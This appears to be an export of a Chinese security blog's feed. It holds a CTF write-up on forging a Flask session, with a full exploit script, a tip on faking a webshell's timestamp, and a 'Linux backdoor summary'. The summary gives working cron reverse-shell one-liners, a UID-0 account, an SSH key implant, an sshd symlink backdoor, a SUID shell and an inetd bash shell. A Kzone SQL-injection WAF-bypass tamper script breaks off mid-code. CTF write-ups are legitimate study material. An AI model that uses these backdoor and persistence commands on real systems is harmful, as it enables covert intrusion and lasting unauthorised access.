class="keyword">return</span> <span class="string">'This file already exists'</span></span><br><span class="line"> file.save(file_save_path)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'This file is not a zipfile'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> extract_path = file_save_path + <span class="string">'_'</span></span><br><span class="line"> os.system(<span class="string">'unzip -n '</span> + file_save_path + <span class="string">' -d '</span>+ extract_path)</span><br><span class="line"> read_obj = os.popen(<span class="string">'cat '</span> + extract_path + <span class="string">'/*'</span>)</span><br><span class="line"> file = read_obj.read()</span><br><span class="line"> read_obj.close()</span><br><span class="line"> os.system(<span class="string">'rm -rf '</span> + extract_path)</span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> file = <span class="keyword">None</span></span><br><span class="line"></span><br><span class="line"> os.remove(file_save_path)</span><br><span class="line"> <span class="keyword">if</span>(file != <span class="keyword">None</span>):</span><br><span class="line"> <span class="keyword">if</span>(file.find(base64.b64decode(<span class="string">'aGN0Zg=='</span>).decode(<span class="string">'utf-8'</span>)) != <span class="number">-1</span>):</span><br><span class="line"> <span class="keyword">return</span> redirect(url_for(<span class="string">'index'</span>, error=<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">return</span> Response(file)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="comment">#app.run(debug=True)</span></span><br><span class="line"> app.run(host=<span class="string">'127.0.0.1'</span>, debug=<span class="keyword">True</span>, port=<span class="number">10008</span>)</span><br></pre></td></tr></table></figure><p>发现随机数种子不安全:由uuid.getnode()获得为固定mac地址</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">random.seed(uuid.getnode())</span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config['SECRET_KEY'] = str(random.random()*100)</span><br></pre></td></tr></table></figure><p>所以读取mac地址/sys/class/net/eth0/address</p><p>mac:02:42:ac:11:00:02–>2485377892354</p><p>用python3执行</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">"import random;random.seed(2485377892354);print (str(random.random()*100))"</span></span><br></pre></td></tr></table></figure><p>得到secret_key=42.42408197657815</p><p>伪造session: eyJ1c2VybmFtZSI6ImFkbWluIn0.XFk6SQ.dp9Uh_Kd6tGKQ12uY7eqoSzvrPo</p><p>得到flag:hctf{2495e2ef667b367a0738f5eae9d6afb983c2}</p><p>贴上百度找的脚本</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask.sessions <span class="keyword">import</span> SecureCookieSessionInterface</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read_file</span><span class="params">(file_name)</span>:</span></span><br><span class="line"> link(file_name)</span><br><span class="line"> files = {<span class="string">'the_file'</span>: open(file_name[<span class="number">-5</span>:] + <span class="string">'.zip'</span>, <span class="string">'rb'</span>)}</span><br><span class="line"> r2 = s.post(url+<span class="string">'upload'</span>, files=files)</span><br><span class="line"> <span class="keyword">return</span> r2.text</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">link</span><span class="params">(file_name)</span>:</span></span><br><span class="line"> os.system(<span class="string">'ln -s {file_name} {output}'</span>.format(file_name = file_name, output = file_name[<span class="number">-5</span>:]))</span><br><span class="line"> os.system(<span class="string">'zip -y -m {output}.zip {output}'</span>.format(file_name = file_name, output = file_name[<span class="number">-5</span>:]))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">'http://hideandseek.2018.hctf.io/'</span></span><br><span class="line"><span class="keyword">with</span> requests.Session() <span class="keyword">as</span> s:</span><br><span class="line"> user_data = {<span class="string">'username'</span>: <span class="string">'123'</span>, <span class="string">'password'</span>: <span class="string">'123456789'</span>}</span><br><span class="line"> r = s.post(url+<span class="string">'login'</span>, data=user_data)</span><br><span class="line"> en = read_file(<span class="string">'/proc/self/environ'</span>)</span><br><span class="line"> print(en)</span><br><span class="line"> ini = re.search(<span class="string">'UWSGI_INI=(.*?)\x00'</span>, en).group(<span class="number">1</span>)</span><br><span class="line"> pwd = re.search(<span class="string">'PWD=(.*?)\x00'</span>, en).group(<span class="number">1</span>)</span><br><span class="line"> print(ini)</span><br><span class="line"> print(pwd)</span><br><span class="line"> ini = read_file(ini)</span><br><span class="line"> print(ini)</span><br><span class="line"> source = re.search(<span class="string">'module = .*?\.(.*?)\n'</span>, ini).group(<span class="number">1</span>)</span><br><span class="line"> source = pwd+<span class="string">'/'</span>+source+<span class="string">'.py'</span></span><br><span class="line"> source = read_file(source)</span><br><span class="line"> print(source)</span><br><span class="line"> <span class="keyword">if</span>(source.find(<span class="string">'import'</span>) == <span class="number">-1</span>):</span><br><span class="line"> exit(<span class="string">'fail'</span>)</span><br><span class="line"> mac = <span class="string">'/sys/class/net/eth0/address'</span></span><br><span class="line"> mac = read_file(mac)</span><br><span class="line"> mac = mac[:<span class="number">-1</span>]</span><br><span class="line"> mac = <span class="string">''</span>.join(mac.split(<span class="string">':'</span>))</span><br><span class="line"> mac = int(mac, <span class="number">16</span>)</span><br><span class="line"> print(mac)</span><br><span class="line"> random.seed(mac)</span><br><span class="line"> key = random.random()*<span class="number">100</span></span><br><span class="line"> print(key)</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.config[<span class="string">'SECRET_KEY'</span>] = str(key)</span><br><span class="line">payload = {<span class="string">'username'</span>: <span class="string">'admin'</span>}</span><br><span class="line">serializer = SecureCookieSessionInterface().get_signing_serializer(app)</span><br><span class="line">session = serializer.dumps(payload)</span><br><span class="line">print(session)</span><br><span class="line">cookies = {<span class="string">'session'</span>: session}</span><br><span class="line">r = requests.get(url, cookies=cookies)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h1 id="hide-and-seek"><a href="#hide-and-seek" class="headerlink" title="hide and seek"></a>hide and seek</h1><p>经过注册登陆后发现有上传点,发现只能上传zip文件,然后发现zip中压缩的文件内容会被解压后输出在页面上,上传php马失败</p>
<p>尝试读取linux下的环境变量:/proc/self/environ</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgiSUPERVISOR_GROUP_NAME=uwsgiHOSTNAME=c52b2c48ec0bSHLVL=0PYTHON_PIP_VERSION=18.1HOME=/rootGPG_KEY=0D96DF4D4110E5C43FBFB17F2D347EA6AA65421DUWSGI_INI=/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.iniNGINX_MAX_UPLOAD=0UWSGI_PROCESSES=16STATIC_URL=/staticUWSGI_CHEAPER=2NGINX_VERSION=1.15.8-1~stretchPATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binNJS_VERSION=1.15.8.0.2.7-1~stretchLANG=C.UTF-8SUPERVISOR_ENABLED=1PYTHON_VERSION=3.6.8NGINX_WORKER_PROCESSES=autoSUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sockSUPERVISOR_PROCESS_NAME=uwsgiLISTEN_PORT=80STATIC_INDEX=0PWD=/app/hard_t0_guess_n9f5a95b5ku9fgSTATIC_PATH=/app/staticPYTHONPATH=/appUWSGI_RELOADS=0</span><br></pre></td></tr></table></figure>
<p>找到 /app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini文件</p>
<p>读取这个文件<br>
</summary>
</entry>
<entry>
<title>自用Linux命令手册</title>
<link href="http://fdrag0n.github.io/2018/11/11/%E8%87%AA%E7%94%A8Linux%E5%91%BD%E4%BB%A4%E6%89%8B%E5%86%8C/"/>
<id>http://fdrag0n.github.io/2018/11/11/自用Linux命令手册/</id>
<published>2018-11-11T14:42:50.000Z</published>
<updated>2018-11-12T11:57:42.710Z</updated>
<content type="html"><![CDATA[<h1 id="Linux-Unix-修改文件时间戳"><a href="#Linux-Unix-修改文件时间戳" class="headerlink" title="Linux/Unix 修改文件时间戳"></a>Linux/Unix 修改文件时间戳</h1><p>Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。</p><p>比如参考 index.php 的时间,再赋给 webshell.php,结果两个文件的时间就一样了。</p><a id="more"></a><p>利用方法</p><p><code>touch -r index.php webshell.php</code></p><p>或者直接将时间戳修改成某年某月某日。如下 2018 年 11 月 11 日。</p><p><code>touch -t 1811111042.30 webshell.php</code></p>]]></content>
<summary type="html">
<h1 id="Linux-Unix-修改文件时间戳"><a href="#Linux-Unix-修改文件时间戳" class="headerlink" title="Linux/Unix 修改文件时间戳"></a>Linux/Unix 修改文件时间戳</h1><p>Unix 下藏后门必须要修改时间,否则很容易被发现,直接利用 touch 就可以了。</p>
<p>比如参考 index.php 的时间,再赋给 webshell.php,结果两个文件的时间就一样了。</p>
</summary>
<category term="linux" scheme="http://fdrag0n.github.io/tags/linux/"/>
</entry>
<entry>
<title>Linux后门总结</title>
<link href="http://fdrag0n.github.io/2018/11/07/2018-11-7-Linux%E5%90%8E%E9%97%A8%E6%80%BB%E7%BB%93/"/>
<id>http://fdrag0n.github.io/2018/11/07/2018-11-7-Linux后门总结/</id>
<published>2018-11-07T11:09:37.000Z</published>
<updated>2018-11-12T11:57:56.052Z</updated>
<content type="html"><![CDATA[<h1 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>测试环境</h1><p>ubuntu16.04<br>反弹shell目标:127.0.0.1:233</p><h1 id="cron定时反弹shell"><a href="#cron定时反弹shell" class="headerlink" title="cron定时反弹shell"></a>cron定时反弹shell</h1><a id="more"></a><h2 id="修改crontab文件"><a href="#修改crontab文件" class="headerlink" title="修改crontab文件"></a>修改crontab文件</h2><p> 创建文件 /etc/…</p><pre><code>#!/bin/bashif netstat -ano|grep -v grep | grep "127.0.0.1">/dev/nullthenecho "OK">/dev/nullelse/sbin/iptables --policy INPUT ACCEPT/sbin/iptables --policy OUTPUT ACCEPTbash -i >& /dev/tcp/127.0.0.1/233 0>&1fi</code></pre><p>增加权限</p><p><code>chmod +sx /etc/...</code></p><p>然后在/etc/crontab中添加定时任务</p><p><code>*/1 * * * * root /etc/...</code></p><p>最后重启一下 crond 的服务<br><code>service cron reload</code></p><h2 id="一句话Crontab后门"><a href="#一句话Crontab后门" class="headerlink" title="一句话Crontab后门"></a>一句话Crontab后门</h2><p>bash版本<br><code>(crontab -l;printf "*/1 * * * * exec 9<> /dev/tcp/127.0.0.1/233;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for</code>whoami<code>%100c\n")|crontab -</code><br>python版本<br><code>(crontab -l;printf "*/5 * * * * /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",233));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\r\rno crontab for</code>whoami<code>%100c\n")|crontab -</code></p><h1 id="Linux-Unix-添加-UID-为-0-的用户"><a href="#Linux-Unix-添加-UID-为-0-的用户" class="headerlink" title="Linux/Unix 添加 UID 为 0 的用户"></a>Linux/Unix 添加 UID 为 0 的用户</h1><p>免交互设置密码<br> useradd seradd -u 0 -o -g root -G fdrag0n</p><pre><code>echo "passwd" | passwd --stdin fdrag0n</code></pre><p>因为linux可能有密码策略<br>所以推荐使用强密码替换passwd</p><h1 id="爆破linux密码"><a href="#爆破linux密码" class="headerlink" title="爆破linux密码"></a>爆破linux密码</h1><p>取出/etc/shadow<br>hashcat爆破</p><h1 id="ssh公钥免密"><a href="#ssh公钥免密" class="headerlink" title="ssh公钥免密"></a>ssh公钥免密</h1><p>将客户端生成的ssh公钥写到所控服务器的~/.ssh/authorized_keys中,然后客户端利用私钥完成认证即可登录。</p><p>客户端:</p><pre><code>$ ssh-keygen -t rsa$ lsid_rsa id_rsa.pub</code></pre><p>把id_rsa.pub写入服务端的authorized_keys中,并修改好相应权限。</p><p>服务端:</p><pre><code>$ chmod 600 ~/.ssh/authorized_keys$ chmod 700 ~/.ssh</code></pre><p>这种后门的特点是简单易用,但在实战中会被服务器的配置环境所限制,以及容易被发现(只要运维不傻)。</p><h1 id="软连接后门"><a href="#软连接后门" class="headerlink" title="软连接后门"></a>软连接后门</h1><pre><code>ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=23333;</code></pre><p>经典后门。直接对sshd建立软连接,之后用任意密码登录即可。</p><p>但这隐蔽性很弱,防护软件或者查看端口状态都可以找到。</p><p><strong>重启会断开</strong></p><h1 id="SUID-shell"><a href="#SUID-shell" class="headerlink" title="SUID shell"></a>SUID shell</h1><p>在root账号下执行</p><pre><code>cp /bin/bash /.fdrag0nchmod 4755 /.fdrag0n</code></pre><p>在普通用户下执行</p><pre><code>/.fdrag0n -p</code></pre><p><strong>检查手段</strong></p><pre><code>find / -perm +4000 -ls</code></pre><h1 id="inetd后门"><a href="#inetd后门" class="headerlink" title="inetd后门"></a>inetd后门</h1><p>修改 /etc/inetd.conf 文件</p><p>原文件:</p><pre><code>#chargen dgram udp wait root internal#discard stream tcp nowait root internal#discard dgram udp wait root internal#daytime stream tcp nowait root internal</code></pre><p>修改为:</p><pre><code>#discard stream tcp nowait root internal#discard dgram udp wait root internaldaytime stream tcp nowait root /bin/bash bash -i</code></pre><p>然后重启inetd</p><pre><code>ps -ef | grep inetdrootkill -HUP xxx</code></pre><p>然后nc连接即可</p><h1 id="rootkit"><a href="#rootkit" class="headerlink" title="rootkit"></a>rootkit</h1><h2 id="openssh后门"><a href="#openssh后门" class="headerlink" title="openssh后门"></a>openssh后门</h2><p>参见<a href="https://fdrag0n.github.io/2018/05/15/SSH后门复现/" title="ssh后门复现">https://fdrag0n.github.io/2018/05/15/SSH后门复现/</a></p><h2 id="内核级rookit"><a href="#内核级rookit" class="headerlink" title="内核级rookit"></a>内核级rookit</h2><p>暂未复现,复现后补上</p>]]></content>
<summary type="html">
<h1 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>测试环境</h1><p>ubuntu16.04<br>反弹shell目标:127.0.0.1:233</p>
<h1 id="cron定时反弹shell"><a href="#cron定时反弹shell" class="headerlink" title="cron定时反弹shell"></a>cron定时反弹shell</h1>
</summary>
<category term="linux" scheme="http://fdrag0n.github.io/tags/linux/"/>
</entry>
<entry>
<title>HCTF2018-Kzone</title>
<link href="http://fdrag0n.github.io/2018/10/19/HCTF2018-Kzone/"/>
<id>http://fdrag0n.github.io/2018/10/19/HCTF2018-Kzone/</id>
<published>2018-10-19T14:19:24.000Z</published>
<updated>2019-12-05T13:19:54.981Z</updated>
<content type="html"><![CDATA[<h1 id="Kzone"><a href="#Kzone" class="headerlink" title="Kzone"></a>Kzone</h1><p>随手一测发现备份文件泄露,www.zip,下载后代码审计。</p><p>看到有后台</p><p>查看login.php的源码:/www/admin</p><p>发现引入了配置文件../include/common.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> </span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">header(<span class="string">'Content-Type: text/html; charset=UTF-8'</span>);</span><br><span class="line">define(<span class="string">'IN_CRONLITE'</span>, <span class="keyword">true</span>);</span><br><span class="line">define(<span class="string">'ROOT'</span>, dirname(<span class="keyword">__FILE__</span>).<span class="string">'/'</span>);</span><br><span class="line">define(<span class="string">'LOGIN_KEY'</span>, <span class="string">'abchdbb679546'</span>);</span><br><span class="line">date_default_timezone_set(<span class="string">"PRC"</span>);</span><br><span class="line">$date = date(<span class="string">"Y-m-d H:i:s"</span>);</span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="keyword">include</span> ROOT.<span class="string">'../config.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($port))$port=<span class="string">'3306'</span>;</span><br><span class="line"><span class="keyword">include_once</span>(ROOT.<span class="string">"db.class.php"</span>);</span><br><span class="line">$DB=<span class="keyword">new</span> DB($host,$user,$pwd,$dbname,$port);</span><br><span class="line"></span><br><span class="line">$password_hash=<span class="string">'!@#%!s!'</span>;</span><br><span class="line"><span class="keyword">require_once</span> <span class="string">"safe.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"function.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"member.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"os.php"</span>;</span><br><span class="line"><span class="keyword">require_once</span> ROOT.<span class="string">"kill.intercept.php"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><a id="more"></a><p>可以看到引入了safe.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">waf</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> $blacklist = <span class="string">'/union|ascii|mid|left|greatest|least|substr|sleep|or|benchmark|like|regexp|if|=|-|<|>|\#|\s/i'</span>;</span><br><span class="line"> <span class="keyword">return</span> preg_replace_callback($blacklist, <span class="function"><span class="keyword">function</span> <span class="params">($match)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'@'</span> . $match[<span class="number">0</span>] . <span class="string">'@'</span>;</span><br><span class="line"> }, $string);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">safe</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (is_array($string)) {</span><br><span class="line"> <span class="keyword">foreach</span> ($string <span class="keyword">as</span> $key => $val) {</span><br><span class="line"> $string[$key] = safe($val);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> $string = waf($string);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $string;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> ($_GET <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_GET[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span> ($_POST <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_POST[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">foreach</span> ($_COOKIE <span class="keyword">as</span> $key => $value) {</span><br><span class="line"> <span class="keyword">if</span> (is_string($value) && !is_numeric($value)) {</span><br><span class="line"> $value = safe($value);</span><br><span class="line"> }</span><br><span class="line"> $_COOKIE[$key] = $value;</span><br><span class="line">}</span><br><span class="line"><span class="keyword">unset</span>($cplen, $key, $value);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>发现waf过滤了很多关键字</p><p>然后再看member.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="keyword">if</span> (!defined(<span class="string">'IN_CRONLITE'</span>)) <span class="keyword">exit</span>();</span><br><span class="line">$islogin = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_COOKIE[<span class="string">"islogin"</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_COOKIE[<span class="string">"login_data"</span>]) {</span><br><span class="line"> $login_data = json_decode($_COOKIE[<span class="string">'login_data'</span>], <span class="keyword">true</span>);</span><br><span class="line"> $admin_user = $login_data[<span class="string">'admin_user'</span>];</span><br><span class="line"> $udata = $DB->get_row(<span class="string">"SELECT * FROM fish_admin WHERE username='$admin_user' limit 1"</span>);</span><br><span class="line"> <span class="keyword">if</span> ($udata[<span class="string">'username'</span>] == <span class="string">''</span>) {</span><br><span class="line"> setcookie(<span class="string">"islogin"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> setcookie(<span class="string">"login_data"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> }</span><br><span class="line"> $admin_pass = sha1($udata[<span class="string">'password'</span>] . LOGIN_KEY);</span><br><span class="line"> <span class="keyword">if</span> ($admin_pass == $login_data[<span class="string">'admin_pass'</span>]) {</span><br><span class="line"> $islogin = <span class="number">1</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> setcookie(<span class="string">"islogin"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> setcookie(<span class="string">"login_data"</span>, <span class="string">""</span>, time() - <span class="number">604800</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SESSION[<span class="string">'islogin'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_SESSION[<span class="string">"admin_user"</span>]) {</span><br><span class="line"> $admin_user = base64_decode($_SESSION[<span class="string">'admin_user'</span>]);</span><br><span class="line"> $udata = $DB->get_row(<span class="string">"SELECT * FROM fish_admin WHERE username='$admin_user' limit 1"</span>);</span><br><span class="line"> $admin_pass = sha1($udata[<span class="string">'password'</span>] . LOGIN_KEY);</span><br><span class="line"> <span class="keyword">if</span> ($admin_pass == $_SESSION[<span class="string">"admin_pass"</span>]) {</span><br><span class="line"> $islogin = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>第6行json_decode()会把unicode自动解码,所以可以绕过waf</p><p>抓个包:,并且在cookie添加islogin=1和login_data=*</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">POST /admin/login.php HTTP/1.1</span><br><span class="line">Host: 206.189.144.143:10000</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Referer: http://206.189.144.143:10000/admin/login.php</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 25</span><br><span class="line">DNT: 1</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=gu1u7fsbr0pub63546vot34163; islogin=1; login_data=*</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line"></span><br><span class="line">user=1&pass=2&login=Login</span><br></pre></td></tr></table></figure><p>然后编写tamper</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> lib.core.enums <span class="keyword">import</span> PRIORITY</span><br><span class="line">__priority__ = PRIORITY.LOW</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dependencies</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">tamper</span><span class="params">(payload, **kwargs)</span>:</span></span><br><span class="line"> data = <span class="string">'''{"admin_user":"%s"};'''</span></span><br><span class="line"> payload = payload.lower()</span><br><span class="line"></span><br><span class="line"> payload = payload.replace(<span class="string">'u'</span>, <span class="string">'\u0075'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'o'</span>, <span class="string">'\u006f'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'i'</span>, <span class="string">'\u0069'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'\''</span>, <span class="string">'\u0027'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'\"'</span>, <span class="string">'\u0022'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">' '</span>, <span class="string">'\u0020'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'s'</span>, <span class="string">'\u0073'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'#'</span>, <span class="string">'\u0023'</span>)</span><br><span class="line"> payload = payload.replace(<span class="string">'>'</span>, <span class="string">'\u003e'</span>)</span><br><span 